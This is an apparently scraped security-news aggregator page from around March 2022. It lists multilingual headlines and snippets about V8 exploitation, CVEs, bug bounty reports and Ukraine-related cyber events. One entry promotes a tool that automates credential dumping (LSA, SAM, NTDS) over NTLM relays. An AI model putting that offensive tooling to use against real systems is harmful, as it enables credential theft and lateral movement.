    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...

  • Open

    TOOL: ntlmrelayx2proxychains combining/automating ntlmrelayx, crackmapexec, and proxychains!
    submitted by /u/BugbearB [link] [comments]
    NPM supply chain attack: node-ipc and peacenotwar sabotaged as an act of protest by the maintainer
    submitted by /u/tubularobot [link] [comments]
    Cool Open Source Security Tools & Programs list
    submitted by /u/Khaotic_Kernel [link] [comments]
    Git honours embedded bare repos - justinsteven
    submitted by /u/Gallus [link] [comments]
    Call for participants in Rizin/Cutter's Google Summer of Code 2022
    submitted by /u/XVilka [link] [comments]
    Arya - new tool to generate pseudo malware samples based on YARA rules
    submitted by /u/n0llbyte [link] [comments]
    cr8escape: New Vulnerability in CRI-O allows for container brekout
    submitted by /u/raesene2 [link] [comments]
    Top 10 CI/CD Security Risks
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    HermeticWiper Technical Analysis Report
    submitted by /u/mstfknn [link] [comments]
    ThreatMapper 1.3.0 update - +runtime SBOM, +secret scanning, +attack path
    submitted by /u/foobarbazwibble [link] [comments]
    From XSS to RCE (dompdf 0day)
    submitted by /u/mckirk_ [link] [comments]
    Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582) - Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.
    submitted by /u/digicat [link] [comments]
    7 RCE and DoS vulnerabilities Found in ClickHouse DBMS
    submitted by /u/SRMish3 [link] [comments]
    CVE-2022-25636 : New Linux Bug in Netfilter Firewall Module Lets Attackers Gain Root Access
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    TOOL: ntlmrelayx2proxychains
    ntlmrelayx2proxychains aims to connect the tool of the SecureAuthCorps' impacket suite, ntlmrelayx.py (hereafter referred to as "ntlmrelayx"), along with @byt3bl33d3r's tool, CrackMapExec (hereafter referred to as "CME"), over proxychains, developped by haad. Currently, when having active relays via ntlmrelayx.py, you need to manually provide user, domain, and ip address in CME over proxychains. The idea behind this tool is to automate this process. So have you ever felt too lazy to explore all shares, loggedin users, sessions, disks, and/or password policy manually after using ntlmrelayx or felt too lazy to dump the lsa, sam, and/or ntds on all systems where you found a local administrator? If so, you'll for sure enjoy ntlmrelayx2proxychains! :) Link: https://github.com/He-No/ntlmrelayx2proxychains submitted by /u/BugbearB [link] [comments]
    Have Your Cake and Eat it Too? An Overview of UNC2891
    submitted by /u/dmchell [link] [comments]
  • Open

    Can you be Hacked by Visiting a Website?
    Visiting websites throughout the decades has always had its risks. With the creation of Flashplayer and JavaScript, site visitors could potentially be impacted by malicious viruses, like the notorious YouAreAnIdiot[.]org pop-ups that caused computers to be overrun by a massive amount of pop-ups until their computer rebooted. Unfortunately, infections can, and likely always, will exist when accessing infected sites.  In this article, we’ll discuss the kinds of hacked sites that are still out there and how to avoid them. Continue reading Can you be Hacked by Visiting a Website? at Sucuri Blog.
  • Open

    Basic Pentesting — Process Report
    Step 1: We being Enumeration. Continue reading on Medium »
  • Open

    X-XSS-Protection headers. Protection or vulnerability?
    What is it? Continue reading on Medium »
    Nmap Cheat Sheet
    Full nmap cheat sheet with example. Continue reading on Medium »
    The 7 Penetration Testing Steps & Phases: a Checklist
    7 Steps and Phases of Penetration Testing Continue reading on Medium »
    Optimism Infinite Money Duplication Bugfix Review
    Summary Continue reading on Immunefi »
    Hats Finance Opens New Bug Bounty Program with Fuji DAO
    About Fuji DAO Continue reading on Medium »
    How I was able to find 50+ Cross site scripting(XSS) Security Vulnerabilities on Bugcrowd Public…
    Hello everyone, I hope by the grace of God everyone who is reading this blog post is doing well and their families during this pandemic… Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1
    Hello Members, I hope that you liked the previous article that is File-Inclusion. Therefore, I worked hard to complete Penetration-list… Continue reading on Medium »
    How I “HACKED” my college site
    Hello readers , I am Aditya , a second year student at Madhav institute of Technology and Science , Gwalior . This is a story of how I… Continue reading on Medium »
    KitHack — Hacking tools pack in Kali Linux
    KitHack Framework is a free and open-source tool available on GitHub. It is designed to automate the process of downloading and installing… Continue reading on Medium »
  • Open

    Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect
    The Malleable C2 profile helps make Cobalt Strike an effective emulator for which it is difficult to design traditional firewall defenses. The post Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect appeared first on Unit42.
  • Open

    Just wondering
    Can a phone be hacked? To where you can see my phone calls, text messages, browser history, and location. If so how can I protect my info? submitted by /u/Valuable-Green-8890 [link] [comments]
    What's the correct term for a SaaS provide who uses another Cloud service for their underlying platform?
    I've been wrestling with finding the correct term for a breed of SaaS provider, and I'm hoping that such a thing exists. I'm talking about the SaaS products that use Azure, AWS or Google on the backend for the platform, but construct their own applications for resale. I want to call them middleware, but I know that is not correct. The reason I'm asking is I get A LOT of proposers who make no comments about their own cybersecurity posture, and keep deferring to whatever security is provided by the underlying platform. Thoughts? submitted by /u/paulexander [link] [comments]
    Safe to explore evxt / hives from a compromised machine?
    hi, one of my friend has been hit from some ransomware, and he just aske me some help to reinstall OS (win10). I wondering that this could be a nice chance to investigate (for fun) windows logs and or system registry with some tools like Registry Explorer. Can I do this on my day-to-day machine? Is there any risk to get infected? Sorry for my probably silly question submitted by /u/g-simon [link] [comments]
    Any good communities or forums for learning assembly language or reverse engineering at all?
    Looking for some communities and forums which can help me to learn more about assembly language and reverse engineering. Anyone have any suggestions or resources? submitted by /u/SufficientDistrict10 [link] [comments]
    functional vs non-functional security requirements
    I have been asked me to create functional and non-functional requirements for the products we will acquire from various different vendors. I work in security architecture department. For non-functional they are going to be pretty much generic and I see significant resources on internet but can someone provide some pointers which will help me make functional requirements document for security architecture ? submitted by /u/anjan42 [link] [comments]
    Pentest Burnout - Looking for advice on next steps
    Bit of a different post here than usual. Ive been a pentester for 3 years now with the same company. Management is poor and there are many hours spent off the clock being used to catch up on writing reports that couldnt be done in time due to overlapping client work. We are busy (which is "a good thing" as they say), but our team has been grinding pretty much non stop for 2 years. High utilization rates (usually pushing 100%) keep us all booked with little to no wiggle room to pursue career development related items like new certs/training unless its done on whats left of our free time. I likely should've left earlier, but I needed the job for stability. I feel more stable financially but not mentally, so I think it may be time to move on. Its hard to decide if Im just burned out from pentesting as a whole or if I would thrive in a better managed environment. Either way, Im leaning towards internal blue team related jobs as it seems to be the best way to transition my skills. My biggest struggle is dealing with too many clients in a short timespan, and having work follow me after hours. I don't know what job in this line of work can eliminate those two things, but I am on the hunt and would love suggestions! TLDR: What are jobs that pentesters can transition into after getting burnt out? I am thinking about internal blue team related positions, but open to any other suggestions. Please feel free to share any similar experiences as well. submitted by /u/UniversitySquirrel [link] [comments]
    Approach to selecting a new pen test vendor. What should I look for/ask?
    Hi all, I work for a financial company that has about 400 employees. I am not an expert on net sec but know some basics. I have been with the company for about two years and am somewhat familiar with our environment. My boss asked me to look into a new pen test vendor and since I have no experience with this sort of thing I was wondering how I should be approaching this. Seems like the last guy who did this is no longer around for guidance. Any help is appreciated. Thank you submitted by /u/Throwawayboi91 [link] [comments]
    web hacking automation
    I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arise in mind, "What bugs are practically automatable". Everyone is automating subdomain takeovers it's easy to automate but what about Xss or SQLi? Are they automating those only checking URL parameters? submitted by /u/crusader2409 [link] [comments]
    How safe is js source obfuscation?
    I don't have much background in security, I am planning to make a small game for an event. Imagine like a flappy bird except that u will get real prize in form of gift card after finishing the game. To prevent players from cheating, I will obfuscate the js source but how safe is this approach? is it easy to bypass? And how much will js obfuscation impacts performance? submitted by /u/Chillseashells [link] [comments]
    Active Directory protocols
    Hi! ​ I am reading on AD network security. Currently, I find only network-related security issues regarding NTLM and Kerberos. Are there not other protocols and correlating attacks that is out there? I would love references to papers or blogs. submitted by /u/DiiBBz [link] [comments]
    Internal Websites / Web GUIs Best Practices
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to SSH, local logins to RADIUS, SNMPv3 and so on. This issue I am having is my coworkers and I are having difference of opinion on certain things. The last issue I had was the best practices in regards to SNMPv3. https://www.reddit.com/r/AskNetsec/comments/taa6ny/snmpv3_password_best_practice/?utm_source=share&utm_medium=web2x&context=3 The advice I got here was helpful for us to come to an understanding on the proper course of action. I would like to ask for more help. We have several internal websites / web GUIs , Cisco Firepower, Cisco Prime, SolarWinds , Cisco Wireless controllers and etc. These site are all internal with no Public facing addresses and just private addressing 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16. I say that we should have a URL and install a web certificate in order to have HTTPS for the traffic to be encrypted. I am getting push back from my coworkers that this is overkill since we don't allow access to these systems. I am thinking that this could be an attack vector since a malicious software could be installed on our network collecting such information and then when they have enough its game over for us. If anyone could direct me to some good information on this topic or take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    Question about HaveIBeenPwned hash lists file size
    Hello, On the website I see two options to download, one of them is ordered by prevalence and one is ordered by hash. Any idea why the ordered by prevalence is much much larger? 17.2 GB vs 11.1 GB https://haveibeenpwned.com/Passwords submitted by /u/itismo [link] [comments]
    Port forwarding VPN server dangerous?
    I want to host my own VPN server. The server in question is pretty discardable a.k.a. if it breaks, I don't really care, so I am planning to port forward it to the internet. The question is: port forwarding SoftEther VPN safe or not? It depends certainly on the port that is open, but in general, how well do VPN servers like softether hold up against worms and trojans and mass-malware? Will it spread to my other devices (which are more valuble than the server)? Is there such thing as network-level port-forwarding malware? I literally tested port forwarding for a minute on a VM device and I got logs from all over the world with 100s of different IP. It is a scary place out there and I want to make sure the port of entry is hardened and secure against these "meteors". submitted by /u/bootsareme [link] [comments]
    Question about Sensitive PII and Non-Sensitive PII
    Every day millions of websites capture information like Name, Address, and Email Addresses for registration on their websites. Is this information considered PII and are they legally obligated to treat it as such? For example, even Facebook captures my name and email address, would this be considered PII? Could someone explain where the line is essentially drawn between what is PII and what is not? Take a CMS like WordPress. WordPress has third-party tools like WooCommerce which capture Name, Physical Address, etc. So, because WooCommerce is capturing this data and it resides on the host installation of WordPress is this considered PII? Which is the point of my question, would million of websites be in violation and could potentially be sued? What would be considered 'reasonable protection'? -FC submitted by /u/FutureCombinations [link] [comments]
  • Open

    Sneaky F*ing Russians: Tracking Sanctioned Super-Yachts
    Last week, Benjamin Strick Tweeted a little piece of satellite imagery from Planet. The imagery was less than a day old, and showed what… Continue reading on Medium »
    Ukraine — Point de situation au 17 mars
    Les dernières 24h Continue reading on Medium »
    What is Open Source Intelligence (OSINT)?
    Open source intelligence is a term originally coined by intelligence services. OSINT uses freely available, open sources such as print… Continue reading on Medium »
    JupyterLab for Python
    Installation Continue reading on Medium »
  • Open

    windows stuff (+ spongebob favicon)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Exploit Development: Browser Exploitation on Windows – CVE-2019-0567 (Part 1)
    Article URL: https://connormcgarr.github.io/type-confusion-part-1/ Comments URL: https://news.ycombinator.com/item?id=30702130 Points: 1 # Comments: 1
    Veeam Backup and Replication Distribution Service CVE-2022-26500, CVE-2022-26501
    Article URL: https://www.veeam.com/kb4288 Comments URL: https://news.ycombinator.com/item?id=30696265 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a ICD(集成网络防御)概念参考模型 by ourren 企业安全运营实践:四个阶段实现风险处置的快和准 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a ICD(集成网络防御)概念参考模型 by ourren 企业安全运营实践:四个阶段实现风险处置的快和准 by ourren 更多最新文章,请访问SecWiki
  • Open

    0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .
    Aiven Ltd disclosed a bug submitted by abrahack: https://hackerone.com/reports/1458236 - Bounty: $1500
    Stored XSS through PDF viewer
    Slack disclosed a bug submitted by hitman_47: https://hackerone.com/reports/881557 - Bounty: $4875
    Open redirect GET-Based on https://www.flickr.com/browser/upgrade/?continue=
    Flickr disclosed a bug submitted by c4rrilat0rr: https://hackerone.com/reports/1217570 - Bounty: $150
  • Open

    [Autopsy] Sample images to learn / practice
    Hi, I am trying to learn autopsy and I am having hard time to find any disk images or data sources that I can use to practice and learn certain aspects/features of autopsy. Can anyone suggest somewhere I can download such samples with/without instructions? submitted by /u/madladmary [link] [comments]
    Lost Mode iPhone BFU?
    submitted by /u/investigator0101 [link] [comments]
    Exploring Career Transition Options
    I am currently exploring possible career options in the private sector and was hoping to get some input. The career I am interested in would be a remote position and hopefully near the six figure mark. For the past 8 years I have been in law enforcement as a forensic examiner for an ICAC task force. I have a BS in computer information systems and current certifications include A+, CFCE, ICMDE, CCME, and MCFE. I would like to continue doing something I find meaningful and am looking further into Threat Investigator positions for Meta, though I have yet to determine if this is a good fit. Does anyone have advice or opinions on what other positions may exist and what additional steps I may need to take to better prepare for such a future transition? submitted by /u/outdorksman [link] [comments]
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    联邦调查局警告称国家黑客正利用MFA漏洞进行横向移动
    美国联邦调查局表示,俄罗斯政府支持的黑客组织正积极利用错误配置的默认多因素认证(MFA)协议从而进入一些非政府组织的云端。
    FreeBuf早报 | 美国帮助乌克兰加强网络战防御;德国建议公民卸载卡巴斯基杀毒软件
    网络安全、数字安全是托起数字经济的底层逻辑,不能建立在侵害消费者知情权与选择权的基础上。
    俄乌冲突导致关键信息基础设施面临风险
    No content preview
    调查发现,近来Google Play已被多款恶意应用渗透
    追踪移动应用生态系统的安全研究人员注意到,最近Google Play 商店的木马渗透率激增,其中一款应用的下载安装量超过了50万次。
    德国BSI机构建议更换卡巴斯基杀毒软件
    BSI建议用户卸载卡巴斯基反病毒软件,因为他们发现这家网络安全公司可能与俄罗斯持续入侵乌克兰期间的黑客攻击有关
    3·15 | 智能音箱安全吗,中国评测来帮您!
    中国软件评测中心选取了市面畅销的多台有屏智能音箱和无屏智能音箱,从网络安全、数据安全和个人信息安全等多个角度进行测评。
    俄罗斯面临 IT 危机,数据存储空间还剩2月用完
    在数据库巨头Oracle(甲骨文)、企业服务提供商SAP等云服务商撤出俄罗斯后,俄罗斯面临严峻的IT存储危机。
    3.15首设安全实验室应对信息安全:网安再成“社会性话题”
    在2022年3·15晚会上,网络安全问题依旧是重头戏,本届315晚会首设信息安全实验室,直观展示不安全。
  • Open

    GitHub won’t restore HTTPie followers despite vulnerability, no notifications
    Article URL: https://twitter.com/httpie/status/1503862290822664198 Comments URL: https://news.ycombinator.com/item?id=30696255 Points: 7 # Comments: 1
  • Open

    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
  • Open

    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...

  • Open

    Bye👋🏼 XSS Auditor (X-XSS-Protection)
    이번 Webkit(Safari 15.4) 업데이트에는 중요한 보안 정책 변경이 있었습니다. X-XSS-Protection으로 잘 알려진 XSS Auditor가 제거됩니다. XSS Auditor는 Refelcted XSS를 완화하기 위한 디자인이자 보안 정책으로 HTML Parsing 단계에서 웹 요청이 response에 어떻게 반응하는지 체크하고, XSS의 가능성이 있으면 차단하는 기능입니다. 개발자가 이를 Response 내 X-XSS-Protection 헤더를 통해 컨트롤할 수 있도록 제공되고 있습니다. 이는 WebKit의 CSP(Content-Security-Policy) 지원 범위가 Level3에 도달하여 CSP로도 충분히 대응이 가능하기 때문이라고 판단되어 제거된다고 하네요. Chrome의 경우 Chrome 78 버전(2019년 8월쯤), Firefox 또한 예전에 종료되었던 상태라 이제 메이저 3사 브라우저에선 모두 지원하지 않는 기능, 헤더가 되었습니다.
    HAR(HTTP Archive format) 포맷과 앞으로의 개발 계획
    오늘은 뭔가 기술적인 이야기보단, 그냥 제가 최근에 급 관심이 생긴 HAR 포맷에 대해 이야기할까 합니다. HAR HAR(HTTP Archive format)는 웹 브라우저과 웹 사이트의 interaction을 로깅하기 위한 목적으로 만들어진 JSON 기반의 포맷입니다. 이는 브라우저와 웹 서비스에서의 성능 측정 정보를 내보내기 위한 목적으로 만들어졌고 Chrome, Firefox, Postman 등 메이저 도구들에서 지원하고 있습니다. Charles Proxy Fiddler Firebug Firefox Google Chrome IE Microsoft Edge Postman OWASP ZAP Etc.. 왜 관심가지나요? HAR의 존재는 오래되기도 했고 저도 분석할 때 브라우저의 개발자 도구에서 많이 봤던 상태라 알고는 있었습니다.
  • Open

    how do you train yourself?
    What are you doing about improving yourself/finding an entry-level job in cybersecurity? What is your routine about it? submitted by /u/ogunal00 [link] [comments]
    GDSA or CCNP Security
    Hey guys, So I do GRC as a living. I skipped from helpdesk into GRC consulting, but I'm interested in gaining technical knowledge in cybersecurity so that I could move to a security engineer/security analyst type role in the event I get tired of the work (which I can see happening atm). Something that should also be mentioned is that my job offers flexibility to be put on engagements that fit a topic you're interested in, though I have heard we don't have as many clients asking for help with implementation. I'm an associate of ISC(2) for the CISSP, have a couple comptia certs, the Azure Administrator, and the CCNA that I grabbed a couple years ago under the "new" exam structure. My company pays for certs, so price is not really an issue. I am interested in whether the GIAC GDSA or the CCNP Security is a more valuable investment. There's not too much information on the GDSA that I can find, and through my research, I have found people recommending to do the CCNP R&S before going to CCNP Security back when it was under a different format. I'm not interested in getting the CCNP Sec if it requires for me to get the CCNP Ent first. I don't really want to be a network engineer nor spend my time learning more advanced networking when I don't see myself using it. The curriculum in the CCNP Sec though seems more up my alley. Another option is to go for my CISM or CISA, but I don't want to focus more on the governance/management side of things when I severely lack practical implementation experience. It is another option on the table though. Thoughts? submitted by /u/DiscombobulatedEar88 [link] [comments]
    Nikto use vulnerabilities found!
    Hey guys so i had this asp.net application i created for testing security (i am completely new to this field) so while looking for some tutorials i found this cool tool named Nikto which scans servers for vulnerabilities and when i was running my asp.net app and testing it i got this line in the scan results saying : OSVDB-3092: /web.config: ASP config file is accessible. how can i access the web.config file that Nikto says is accessible ? submitted by /u/darkuniv [link] [comments]
    Is there any way to currently circumvent China’s GFW?
    Was reading a couple articles written in last 12 months and I get the sense that most OpenVPN services are detected and blocked, as well as UDP (WireGuard). Is there any alternative that currently works besides direct satellite options? submitted by /u/DryBloomer [link] [comments]
  • Open

    OpenSSL CVE-2022-0778: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
    submitted by /u/yawkat [link] [comments]
    NSA, CISA Release Updated Kubernetes Hardening Guidance
    submitted by /u/sanitybit [link] [comments]
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Coding C2 Bind Shell Channel with C# and Powershell
    https://www.youtube.com/watch?v=9CX7muqkjtQ submitted by /u/luzunov [link] [comments]
    Automating a Red Team Lab: Logging and Monitoring
    submitted by /u/nickonos [link] [comments]
  • Open

    International Women’s Day + Anti-War Protests + Ongoing “Freedom” convoys + More
    On this 4th edition of the discursus Protest Analytics newsletter — March 15, 2022 Continue reading on discursus.io »
    Don’t be a troll
    Around a year ago, I ended up in a Messenger conversation to assist a friend who had started a new business and had the surprise of… Continue reading on Medium »
  • Open

    SecWiki News 2022-03-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Node.js security: Parse Server remote code execution vulnerability resolved
    Article URL: https://portswigger.net/daily-swig/node-js-security-parse-server-remote-code-execution-vulnerability-resolved Comments URL: https://news.ycombinator.com/item?id=30686373 Points: 1 # Comments: 0
  • Open

    Cr8escape: Zero-day in CRI-O Container Engine (CVE-2022-0811)
    Article URL: https://www.crowdstrike.com/blog/cr8escape-zero-day-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/ Comments URL: https://news.ycombinator.com/item?id=30686358 Points: 3 # Comments: 0
  • Open

    2月以来,欧洲移动恶意软件激增 500%
    2022 年 2 月以来,研究人员发现欧洲的移动恶意软件传播增加了 500%。
    【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁
    从西方APT组织的攻击历史及已经泄露的网络武器看,高隐匿、高持久化(Low&amp;Slow)是其关键特征,而 Rootkit 则是达成此目的的重要技术之一。
    乌克兰在冲突中使用了Clearview AI的面部识别技术
    近日,乌克兰国防部宣布将Clearview公司提供的人工智能面部识别技术运营到战场。
    黑客入侵俄罗斯能源巨头位于德国的子公司,窃取了20TB数据
    黑客表示,俄罗斯对乌克兰的入侵是导致攻击的根本原因。
    赶紧打开手机看看,这14款APP被工信部点名
    工信部开展App侵害用户权益整治“回头看”行动,组织第三方检测机构对APP进行重点检测,共发现14款App存在问题。
    FreeBuf早报 | 大规模DDoS攻击袭击以色列;汽车巨头DENSO遭勒索攻击
    有关育碧遭到网络攻击的谣言在网上流传,而数据勒索组织LAPSUS$则表明这并不是留言,他们已经入侵了育碧。
    俄乌网络战时间线全回顾及对抗特点研究梳理
    乌克兰与俄罗斯之间爆发全面军事战争,网络成为了真实的战场空间。
    以色列遭大规模DDoS攻击,导致其政府网站下线
    据以色列媒体报道称,大规模的DDoS攻击致使许多以色列政府网站被迫关闭
  • Open

    How Chrome Became Highest Scoring Browser on Speedometer, Ever
    Last week we released a blog post about our improvements in Chrome speed over the past year culminating with the M99 release of Chrome. We wanted to follow up by going in depth on how we achieved this milestone in browser performance. Since the launch of Chrome in 2008, one of our core principles has been to build the fastest browser, whether you're on your phone or laptop. We have never strayed from our performance mission, and are always analyzing and optimizing every part of Chrome. We're proud to announce that Chrome scores over 300 on Apple’s Speedometer 2.0 benchmark suite on the M1 MacBook, the highest score we’ve ever seen. In this The Fast and the Curious post we'll go behind the scenes to share all the work that went into making Chrome blazingly fast. “If you can’t measure it y…
  • Open

    Los 3 Chiflados
    http://37.187.20.239/Los%203%20Chiflados/ submitted by /u/inoculatemedia [link] [comments]
    huge collection of flash games (nsfw) just in case
    submitted by /u/millhouse187 [link] [comments]
  • Open

    The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation
    submitted by /u/AttitudeAdjuster [link] [comments]
  • Open

    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
  • Open

    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
  • Open

    Bug Bounty on Marsbase
    Right after the release of the dOTC of the Marsbase platform, we are launching a Bug Bounty program to find bugs. This program provides… Continue reading on Medium »

  • Open

    Burnout and me
    Please avoid it because it is preventable. Continue reading on Medium »
    Баг Баунти миссия на Marsbase dOTC
    В связи с релизом dOTC платформы Marsbase мы запускаем программу Bug Bounty по поиску багов. Данная программа предусматривает, что… Continue reading on Medium »
    Achieving Remote Code Execution via Unrestricted File Upload
    $whoami: Continue reading on Medium »
    SQL Injection at Spotify
    SQL Injection at Spotify. Continue reading on Medium »
    Story about more than 3.5 million PII leakage in Yahoo!!!
    Hello GUYS, Continue reading on Medium »
    How I Made The BBC Hall Of Fame 3 Times
    Happy Monday to anyone reading this write up. Today I am going to describe how I was able to make the BBC Hall Of Fame 3 times. My… Continue reading on Medium »
    My Pentest Log -10- (A Little Tip)
    Greetings to all from Khrysokeras, Continue reading on Medium »
    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
